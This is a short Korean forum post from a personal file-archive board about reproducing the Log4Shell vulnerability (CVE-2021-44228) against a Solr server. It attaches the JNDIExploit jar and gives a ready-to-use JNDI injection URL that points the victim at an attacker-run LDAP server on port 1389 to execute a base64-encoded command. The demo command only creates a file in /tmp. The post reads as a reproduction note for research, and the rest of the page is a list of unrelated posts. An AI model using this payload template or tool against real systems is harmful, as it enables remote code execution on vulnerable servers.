메뉴 건너뛰기

pds

log4j 취약점 POC 를 위한 LDAP jar

suritam92022.09.16 10:57조회 수 30댓글 0

  • 1
    • 글자 크기

log4j 취약점 설명이 잘 되어 있는 페이지가 있다.

 

 

https://www.kisec.com/rsrh_rpt_det.do?id=783

 

CVE-2021-44228 을 재현하기 위해 해당 페이지를 참고 했다.

 

Attacker와 Butt(victim)만 있으면 재현 가능한 취약점에 비해 Communicator 까지 필요한 POC라서 이해하는데 시간이 많이 소요된다.

 

JNDIExploit-1.2-SNAPSHOT.jar 를 배포하던 저장소의 계정이 삭제되어 해당 파일을 입수하는데 시간이 걸렸다.

 

해당 JAR만 잘 실행하면 ldap을 통해 공격 코드를 전송할 수 있다.

 

한 가지 더 주의할 점은 base64 encoding 으로 보내고 decoding 시켜주는 경로를 사용해야 한다는 점이다.

 

웹 브라우저로도 테스트 가능하며 ldap은 같은 경로에서 java로 실행하여 성공하였다.

 

 

http://취약환경이있는서버:8983/solr/admin/cores?action=${jndi:ldap://ldap을실행한서버:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9jd2UtMjAyMS00NDIyOA==}

 

touch /tmp/cwe-2021-44228 는 base64 encoding한 코드이다.

 

  • 1
    • 글자 크기
new이미지 얻기 (by 박영식) ie7설치시 xp 인증 skip reg파일 (by 박영식)

댓글 달기

번호 제목 글쓴이 날짜 조회 수
12 php의 외부로그인 설치 박영식 2002.04.21 10580
11 php용 rss리더기 박영식 2007.07.28 8552
10 php 주요 함수 박영식 2003.12.25 10870
9 peview lispro06 2015.05.15 9948
8 nipper-0.11.7 lispro06 2016.01.13 9873
7 new이미지 얻기 박영식 2002.12.11 11691
log4j 취약점 POC 를 위한 LDAP jar suritam9 2022.09.16 30
5 ie7설치시 xp 인증 skip reg파일 박영식 2007.03.03 8653
4 httprequest 파일 박영식 2008.01.06 9504
3 expectation maximazation 박영식 2008.09.20 8617
2 db에서 회원정보 추출하기 박영식 2002.06.22 9335
1 date() 함수와 옵션사용하기, db에서 특정부분 얻기 박영식 2002.12.11 10340
첨부 (1)
JNDIExploit.v1.2.zip
34.26MB / Download 22
위로